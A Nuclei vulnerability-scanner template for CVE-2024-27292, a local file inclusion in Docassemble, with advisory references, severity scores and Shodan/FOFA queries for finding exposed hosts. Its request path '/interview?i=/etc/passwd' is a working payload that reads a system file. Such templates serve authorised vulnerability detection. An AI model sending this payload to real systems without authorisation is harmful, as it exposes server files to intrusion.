41 lines
1.4 KiB
YAML
41 lines
1.4 KiB
YAML
id: CVE-2024-27292
|
|
|
|
info:
|
|
name: Docassemble - Local File Inclusion
|
|
author: johnk3r
|
|
severity: high
|
|
description: |
|
|
Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
|
|
reference:
|
|
- https://tantosec.com/blog/docassemble/
|
|
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
|
|
- https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-27292
|
|
cwe-id: CWE-706
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.0866
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.title:"docassemble"
|
|
fofa-query: icon_hash="-575790689"
|
|
tags: cve,cve2024,docassemble,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/interview?i=/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 501
|
|
# digest: 4b0a00483046022100d8b89e9955181d9c42c128bf1113ced63499aabac72a131110385c0d688d14cd022100c3821f365b88c32e60e587c998e270a901c7bf42808ab259453168ca771c16d8:922c64590222798bb761d5b6d8e72950 |